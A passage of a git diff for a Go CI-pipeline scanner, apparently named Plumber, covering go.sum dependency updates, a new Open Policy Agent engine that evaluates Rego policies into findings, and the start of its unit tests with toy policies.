+github.com/schollz/progressbar/v3 v3.19.0 h1:Ea18xuIRQXLAUidVDox3AbwfUhD0/1IvohyTutOIFoc=
+github.com/schollz/progressbar/v3 v3.19.0/go.mod h1:IsO3lpbaGuzh8zIMzgY3+J8l4C8GjO0Y9S69eFvNsec=
+github.com/segmentio/asm v1.2.1 h1:DTNbBqs57ioxAD4PrArqftgypG4/qNpXoJx8TVXxPR0=
+github.com/segmentio/asm v1.2.1/go.mod h1:BqMnlJP91P8d+4ibuonYZw9mfnzI9HfxselHZr5aAcs=
+github.com/sergi/go-diff v1.4.0 h1:n/SP9D5ad1fORl+llWyN+D6qoUETXNZARKjyY2/KVCw=
+github.com/sergi/go-diff v1.4.0/go.mod h1:A0bzQcvG0E7Rwjx0REVgAGH58e96+X0MeOfepqsbeW4=
github.com/sirupsen/logrus v1.9.4 h1:TsZE7l11zFCLZnZ+teH4Umoq5BhEIfIzfRDZ1Uzql2w=
github.com/sirupsen/logrus v1.9.4/go.mod h1:ftWc9WdOfJ0a92nsE2jF5u5ZwH8Bv2zdeOC42RjbV2g=
-github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM=
-github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y=
-github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
-github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+github.com/spf13/cobra v1.10.2 h1:DMTTonx5m65Ic0GOoRY2c16WCbHxOOw6xxezuLaBpcU=
+github.com/spf13/cobra v1.10.2/go.mod h1:7C1pvHqHw5A4vrJfjNwvOdzYu0Gml16OCs2GRiTUUS4=
+github.com/spf13/pflag v1.0.9/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
+github.com/spf13/pflag v1.0.10 h1:4EBh2KAYBwaONj6b2Ye1GiHfwjqyROoF4RwYO+vPwFk=
+github.com/spf13/pflag v1.0.10/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U=
github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U=
+github.com/tchap/go-patricia/v2 v2.3.3 h1:xfNEsODumaEcCcY3gI0hYPZ/PcpVv5ju6RMAhgwZDDc=
+github.com/tchap/go-patricia/v2 v2.3.3/go.mod h1:VZRHKAb53DLaG+nA9EaYYiaEx6YztwDlLElMsnSHD4k=
+github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e h1:BuzhfgfWQbX0dWzYzT1zsORLnHRv3bcRcsaUk0VmXA8=
+github.com/thlib/go-timezone-local v0.0.0-20210907160436-ef149e42d28e/go.mod h1:/Tnicc6m/lsJE0irFMA0LfIwTBo4QP7A8IfyIv4zZKI=
+github.com/valyala/fastjson v1.6.7 h1:ZE4tRy0CIkh+qDc5McjatheGX2czdn8slQjomexVpBM=
+github.com/valyala/fastjson v1.6.7/go.mod h1:CLCAqky6SMuOcxStkYQvblddUtoRxhYMGLrsQns1aXY=
+github.com/vektah/gqlparser/v2 v2.5.32 h1:k9QPJd4sEDTL+qB4ncPLflqTJ3MmjB9SrVzJrawpFSc=
+github.com/vektah/gqlparser/v2 v2.5.32/go.mod h1:c1I28gSOVNzlfc4WuDlqU7voQnsqI6OG2amkBAFmgts=
+github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb h1:zGWFAtiMcyryUHoUjUJX0/lt1H2+i2Ka2n+D3DImSNo=
+github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU=
+github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 h1:EzJWgHovont7NscjpAxXsDA8S8BMYve8Y5+7cuRE7R0=
+github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ=
+github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
+github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
+github.com/yashtewari/glob-intersection v0.2.0 h1:8iuHdN88yYuCzCdjt0gDe+6bAhUwBeEWqThExu54RFg=
+github.com/yashtewari/glob-intersection v0.2.0/go.mod h1:LK7pIC3piUjovexikBbJ26Yml7g8xa5bsjfx2v1fwok=
github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
-gitlab.com/gitlab-org/api/client-go v1.46.0 h1:YxBWFZIFYKcGESCb9fpkwzouo+apyB9pr/XTWzNoL24=
-gitlab.com/gitlab-org/api/client-go v1.46.0/go.mod h1:FtgyU6g2HS5+fMhw6nLK96GBEEBx5MzntOiJWfIaiN8=
+gitlab.com/gitlab-org/api/client-go v1.13.0 h1:MNH8a5UB4MgX2g0opJSWhHw2bfoWuWUoWXf/O/ppFC4=
+gitlab.com/gitlab-org/api/client-go v1.13.0/go.mod h1:adtVJ4zSTEJ2fP5Pb1zF4Ox1OKFg0MH43yxpb0T0248=
+go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
+go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
+go.opentelemetry.io/otel v1.40.0 h1:oA5YeOcpRTXq6NN7frwmwFR0Cn3RhTVZvXsP4duvCms=
+go.opentelemetry.io/otel v1.40.0/go.mod h1:IMb+uXZUKkMXdPddhwAHm6UfOwJyh4ct1ybIlV14J0g=
+go.opentelemetry.io/otel/metric v1.40.0 h1:rcZe317KPftE2rstWIBitCdVp89A2HqjkxR3c11+p9g=
+go.opentelemetry.io/otel/metric v1.40.0/go.mod h1:ib/crwQH7N3r5kfiBZQbwrTge743UDc7DTFVZrrXnqc=
+go.opentelemetry.io/otel/trace v1.40.0 h1:WA4etStDttCSYuhwvEa8OP8I5EWu24lkOzp+ZYblVjw=
+go.opentelemetry.io/otel/trace v1.40.0/go.mod h1:zeAhriXecNGP/s2SEG3+Y8X9ujcJOTqQ5RgdEJcawiA=
+go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI=
+go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU=
+go.yaml.in/yaml/v3 v3.0.4 h1:tfq32ie2Jv2UxXFdLJdh3jXuOzWiL1fo0bu/FbuKpbc=
+go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
+golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
+golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
+golang.org/x/exp v0.0.0-20250813145105-42675adae3e6 h1:SbTAbRFnd5kjQXbczszQ0hdk3ctwYf3qBNH9jIsGclE=
+golang.org/x/exp v0.0.0-20250813145105-42675adae3e6/go.mod h1:4QTo5u+SEIbbKW1RacMZq1YEfOBqeXa19JeshGi+zc4=
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
+golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c=
+golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
+golang.org/x/net v0.51.0 h1:94R/GTO7mt3/4wIKpcR5gkGmRLOuE/2hNGeWq/GBIFo=
+golang.org/x/net v0.51.0/go.mod h1:aamm+2QF5ogm02fjy5Bb7CQ0WMt1/WVM7FtyaTLlA9Y=
golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw=
golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.20.0 h1:e0PTpb7pjO8GAtTs2dQ6jYa5BWYlMuX047Dco/pItO4=
+golang.org/x/sync v0.20.0/go.mod h1:9xrNwdLfx4jkKbNva9FpL6vEN7evnE43NNNJQ2LF3+0=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20210831042530-f4d43177bf5e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.43.0 h1:Rlag2XtaFTxp19wS8MXlJwTvoh8ArU6ezoyFsMyCTNI=
-golang.org/x/sys v0.43.0/go.mod h1:4GL1E5IUh+htKOUEOaiffhrAeqysfVGipDYzABqnCmw=
+golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
+golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
-golang.org/x/term v0.42.0 h1:UiKe+zDFmJobeJ5ggPwOshJIVt6/Ft0rcfrXZDLWAWY=
-golang.org/x/term v0.42.0/go.mod h1:Dq/D+snpsbazcBG5+F9Q1n2rXV8Ma+71xEjTRufARgY=
+golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
+golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8=
-golang.org/x/text v0.32.0 h1:ZD01bjUt1FQ9WJ0ClOL5vxgxOI/sVCNgX1YtKwcY0mU=
-golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY=
-golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI=
-golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4=
+golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk=
+golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA=
+golang.org/x/time v0.15.0 h1:bbrp8t3bGUeFOx08pvsMYRTCVSMk89u4tKbNOZbp88U=
+golang.org/x/time v0.15.0/go.mod h1:Y4YMaQmXwGQZoFaVFk4YpCt4FLQMYKZe9oeV/f4MSno=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
+golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc=
+golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE=
+google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
+gopkg.in/h2non/gock.v1 v1.1.2 h1:jBbHXgGBK/AoPVfJh5x4r/WxIrElvbLel8TCZkkZJoY=
+gopkg.in/h2non/gock.v1 v1.1.2/go.mod h1:n7UGz/ckNChHiK05rDoiC4MYSunEC/lyaUm2WWaDva0=
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+sigs.k8s.io/yaml v1.6.0 h1:G8fkbMSAFqgEFgh4b1wmtzDnioxFCUgTZhlbj5P9QYs=
+sigs.k8s.io/yaml v1.6.0/go.mod h1:796bPqUfzR/0jLAl6XjHl3Ck7MiyVv8dbTdyT3/pMf4=
diff --git a/internal/engine/opa/engine.go b/internal/engine/opa/engine.go
new file mode 100644
index 0000000..742aaab
--- /dev/null
+++ b/internal/engine/opa/engine.go
@@ -0,0 +1,311 @@
+// Package opa wraps the Open Policy Agent runtime for Plumber's rule engine.
+// Each policy is a Rego module evaluated against an ir.NormalizedPipeline and
+// emits violations through the shared "deny" rule.
+//
+// This is the Phase 0 scaffold: it can load in-memory modules and return
+// findings. Embedded policy discovery, user-policy overrides, and reporter
+// integration land in later phases.
+package opa
+
+import (
+ "bytes"
+ "cmp"
+ "context"
+ "encoding/json"
+ "fmt"
+ "io/fs"
+ "slices"
+ "sort"
+ "strings"
+
+ "github.com/open-policy-agent/opa/v1/rego"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+// Finding is a single rule violation emitted by a policy.
+// File and Line, when populated, point at the exact location of the
+// offending job in the source workflow/pipeline file so editors and
+// terminals can render a clickable file:line link.
+//
+// Data carries policy-specific structured payload (variable name,
+// affected image link, location, β¦) emitted by the Rego rule next
+// to the canonical fields. It serialises inline at the top level so
+// downstream consumers can read both the human message and the
+// machine-parseable evidence on the same finding object.
+type Finding struct {
+ Code string `json:"-"`
+ Severity string `json:"-"`
+ Message string `json:"-"`
+ Job string `json:"-"`
+ File string `json:"-"`
+ Line int `json:"-"`
+ Data map[string]any `json:"-"`
+}
+
+// MarshalJSON flattens the canonical fields and the Data payload into
+// a single object so structured keys appear at the top level (the
+// shape pre-Rego consumers parsed). Empty canonical fields are
+// omitted, mirroring the previous `omitempty` tags.
+func (f Finding) MarshalJSON() ([]byte, error) {
+ out := map[string]any{}
+ for k, v := range f.Data {
+ out[k] = v
+ }
+ if f.Code != "" {
+ out["code"] = f.Code
+ }
+ if f.Severity != "" {
+ out["severity"] = f.Severity
+ }
+ if f.Message != "" {
+ out["message"] = f.Message
+ }
+ if f.Job != "" {
+ out["job"] = f.Job
+ }
+ if f.File != "" {
+ out["file"] = f.File
+ }
+ if f.Line != 0 {
+ out["line"] = f.Line
+ }
+ return json.Marshal(out)
+}
+
+// UnmarshalJSON splits an incoming flat object into the canonical
+// fields and the Data bag. Unknown keys land in Data so they survive
+// a round-trip even when added by future rules.
+func (f *Finding) UnmarshalJSON(b []byte) error {
+ var raw map[string]any
+ if err := json.Unmarshal(b, &raw); err != nil {
+ return err
+ }
+ if v, ok := raw["code"].(string); ok {
+ f.Code = v
+ delete(raw, "code")
+ }
+ if v, ok := raw["severity"].(string); ok {
+ f.Severity = v
+ delete(raw, "severity")
+ }
+ if v, ok := raw["message"].(string); ok {
+ f.Message = v
+ delete(raw, "message")
+ }
+ if v, ok := raw["job"].(string); ok {
+ f.Job = v
+ delete(raw, "job")
+ }
+ if v, ok := raw["file"].(string); ok {
+ f.File = v
+ delete(raw, "file")
+ }
+ if v, ok := raw["line"].(float64); ok {
+ f.Line = int(v)
+ delete(raw, "line")
+ }
+ if len(raw) > 0 {
+ f.Data = raw
+ }
+ return nil
+}
+
+// Engine evaluates Rego policies against an IR pipeline.
+type Engine struct {
+ modules map[string]string
+}
+
+// New returns an Engine with no policies loaded.
+func New() *Engine {
+ return &Engine{modules: make(map[string]string)}
+}
+
+// LoadModule registers a Rego module under the given logical name. The name
+// must match the module's package path (the "deny" rule is queried at
+// data..deny).
+func (e *Engine) LoadModule(name, source string) {
+ e.modules[name] = source
+}
+
+// LoadFromFS loads every .rego file at the root of fsys. The module's
+// logical name is the file's base name without its extension. Nested
+// subdirectories are ignored for now; the concern-based layout lands
+// with the first real policies in Phase 2.
+func (e *Engine) LoadFromFS(fsys fs.FS) error {
+ entries, err := fs.ReadDir(fsys, ".")
+ if err != nil {
+ return fmt.Errorf("read policies dir: %w", err)
+ }
+ for _, entry := range entries {
+ if entry.IsDir() {
+ continue
+ }
+ fileName := entry.Name()
+ if !strings.HasSuffix(fileName, ".rego") {
+ continue
+ }
+ content, err := fs.ReadFile(fsys, fileName)
+ if err != nil {
+ return fmt.Errorf("read policy %q: %w", fileName, err)
+ }
+ e.LoadModule(strings.TrimSuffix(fileName, ".rego"), string(content))
+ }
+ return nil
+}
+
+// Evaluate runs every loaded policy against pipeline and returns the
+// aggregated findings. Policies see a two-field input:
+//
+// input.pipeline β the NormalizedPipeline
+// input.config β an arbitrary map forwarded from .plumber.yaml
+//
+// config may be nil. Pipeline must not be nil.
+func (e *Engine) Evaluate(ctx context.Context, pipeline *ir.NormalizedPipeline, config map[string]any) ([]Finding, error) {
+ if pipeline == nil {
+ return nil, fmt.Errorf("evaluate: nil pipeline")
+ }
+
+ input, err := buildInput(pipeline, config)
+ if err != nil {
+ return nil, fmt.Errorf("evaluate: build input: %w", err)
+ }
+
+ names := make([]string, 0, len(e.modules))
+ for name := range e.modules {
+ names = append(names, name)
+ }
+ sort.Strings(names)
+
+ var findings []Finding
+ for _, name := range names {
+ source := e.modules[name]
+ moduleFindings, err := evalModule(ctx, name, source, input)
+ if err != nil {
+ return nil, fmt.Errorf("evaluate module %q: %w", name, err)
+ }
+ findings = append(findings, moduleFindings...)
+ }
+ enrichFindingsWithJobLocation(findings, pipeline)
+ sortFindingsInPlace(findings)
+ return findings, nil
+}
+
+// sortFindingsInPlace orders findings deterministically for stable JSON and CLI output.
+func sortFindingsInPlace(findings []Finding) {
+ slices.SortFunc(findings, compareFindings)
+}
+
+func compareFindings(a, b Finding) int {
+ return cmp.Or(
+ cmp.Compare(a.Code, b.Code),
+ cmp.Compare(a.Job, b.Job),
+ cmp.Compare(a.File, b.File),
+ cmp.Compare(a.Line, b.Line),
+ cmp.Compare(a.Severity, b.Severity),
+ cmp.Compare(a.Message, b.Message),
+ bytes.Compare(marshalDataForSort(a.Data), marshalDataForSort(b.Data)),
+ )
+}
+
+func marshalDataForSort(d map[string]any) []byte {
+ if len(d) == 0 {
+ return []byte("{}")
+ }
+ raw, err := json.Marshal(d)
+ if err != nil {
+ return []byte{}
+ }
+ return raw
+}
+
+// docURLBase is the canonical issues documentation root. Every
+// finding gets a `docUrl` derived from its code so consumers (CI
+// gates, dashboards, MR comments) can link back without hard-coding
+// the format on their side.
+const docURLBase = "https://getplumber.io/docs/use-plumber/issues/"
+
+// enrichFindingsWithJobLocation fills File and Line on every finding
+// whose Job field matches a job in the pipeline β saves every policy
+// from having to emit those fields manually. A policy may still set
+// File/Line explicitly if it has a more precise location (e.g. a
+// specific step line): in that case the explicit value wins. Also
+// stamps `docUrl` on every finding's Data bag.
+func enrichFindingsWithJobLocation(findings []Finding, pipeline *ir.NormalizedPipeline) {
+ for i := range findings {
+ f := &findings[i]
+ if f.Code != "" {
+ if f.Data == nil {
+ f.Data = map[string]any{}
+ }
+ if _, has := f.Data["docUrl"]; !has {
+ f.Data["docUrl"] = docURLBase + f.Code
+ }
+ }
+ }
+ if pipeline == nil {
+ return
+ }
+ byName := make(map[string]*ir.Job, len(pipeline.Jobs))
+ for i := range pipeline.Jobs {
+ byName[pipeline.Jobs[i].Name] = &pipeline.Jobs[i]
+ }
+ for i := range findings {
+ f := &findings[i]
+ if f.Job == "" {
+ continue
+ }
+ job, ok := byName[f.Job]
+ if !ok {
+ continue
+ }
+ if f.File == "" {
+ f.File = job.OriginFile
+ }
+ if f.Line == 0 {
+ f.Line = job.OriginLine
+ }
+ }
+}
+
+// buildInput JSON round-trips the IR so OPA sees a plain map (no Go pointers
+// or tagged fields) and nests it under "pipeline" together with the caller
+// config under "config".
+func buildInput(pipeline *ir.NormalizedPipeline, config map[string]any) (map[string]any, error) {
+ raw, err := json.Marshal(pipeline)
+ if err != nil {
+ return nil, err
+ }
+ var pipelineMap map[string]any
+ if err := json.Unmarshal(raw, &pipelineMap); err != nil {
+ return nil, err
+ }
+ return map[string]any{
+ "pipeline": pipelineMap,
+ "config": config,
+ }, nil
+}
+
+func evalModule(ctx context.Context, name, source string, input map[string]any) ([]Finding, error) {
+ r := rego.New(
+ rego.Query(fmt.Sprintf("data.%s.deny", name)),
+ rego.Module(name+".rego", source),
+ rego.Input(input),
+ )
+ rs, err := r.Eval(ctx)
+ if err != nil {
+ return nil, err
+ }
+ if len(rs) == 0 || len(rs[0].Expressions) == 0 {
+ return nil, nil
+ }
+ raw, err := json.Marshal(rs[0].Expressions[0].Value)
+ if err != nil {
+ return nil, fmt.Errorf("marshal findings: %w", err)
+ }
+ var findings []Finding
+ if err := json.Unmarshal(raw, &findings); err != nil {
+ return nil, fmt.Errorf("unmarshal findings: %w", err)
+ }
+ return findings, nil
+}
diff --git a/internal/engine/opa/engine_test.go b/internal/engine/opa/engine_test.go
new file mode 100644
index 0000000..73d0812
--- /dev/null
+++ b/internal/engine/opa/engine_test.go
@@ -0,0 +1,179 @@
+package opa
+
+import (
+ "context"
+ "testing"
+ "testing/fstest"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+func TestEvaluateNoModules(t *testing.T) {
+ engine := New()
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(findings) != 0 {
+ t.Fatalf("expected no findings, got %d", len(findings))
+ }
+}
+
+func TestEvaluateToyPolicy(t *testing.T) {
+ const module = `package toy
+
+deny contains finding if {
+ input.pipeline.provider == "gitlab"
+ finding := {
+ "code": "TOY-001",
+ "severity": "low",
+ "message": "gitlab pipeline detected",
+ }
+}`
+
+ engine := New()
+ engine.LoadModule("toy", module)
+
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(findings) != 1 {
+ t.Fatalf("expected 1 finding, got %d", len(findings))
+ }
+ got := findings[0]
+ if got.Code != "TOY-001" {
+ t.Fatalf("expected code TOY-001, got %q", got.Code)
+ }
+ if got.Severity != "low" {
+ t.Fatalf("expected severity low, got %q", got.Severity)
+ }
+}
+
+func TestEvaluateNilPipeline(t *testing.T) {
+ engine := New()
+ if _, err := engine.Evaluate(context.Background(), nil, nil); err == nil {
+ t.Fatal("expected error for nil pipeline")
+ }
+}
+
+func TestEvaluateConfigIsExposed(t *testing.T) {
+ const module = `package cfgtest
+
+deny contains finding if {
+ input.config.threshold > 0
+ finding := {
+ "code": "CFG-001",
+ "severity": "low",
+ "message": sprintf("threshold is %d", [input.config.threshold]),
+ }
+}`
+
+ engine := New()
+ engine.LoadModule("cfgtest", module)
+
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+ cfg := map[string]any{"threshold": 5}
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(findings) != 1 {
+ t.Fatalf("expected 1 finding, got %d", len(findings))
+ }
+ if findings[0].Code != "CFG-001" {
+ t.Fatalf("expected code CFG-001, got %q", findings[0].Code)
+ }
+}
+
+func TestEvaluateFindingsSorted(t *testing.T) {
+ const zebra = `package zebra
+
+deny contains finding if {
+ input.pipeline.provider == "gitlab"
+ finding := {"code": "ZEB-001", "severity": "low", "message": "zebra"}
+}`
+ const alpha = `package alpha
+
+deny contains finding if {
+ input.pipeline.provider == "gitlab"
+ finding := {"code": "ALP-001", "severity": "low", "message": "alpha"}
+}`
+
+ engine := New()
+ engine.LoadModule("zebra", zebra)
+ engine.LoadModule("alpha", alpha)
+
+ pipeline := &ir.NormalizedPipeline{Provider: ir.ProviderGitLab}
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if len(findings) != 2 {
+ t.Fatalf("expected 2 findings, got %d", len(findings))
+ }
+ if findings[0].Code != "ALP-001" || findings[1].Code != "ZEB-001" {
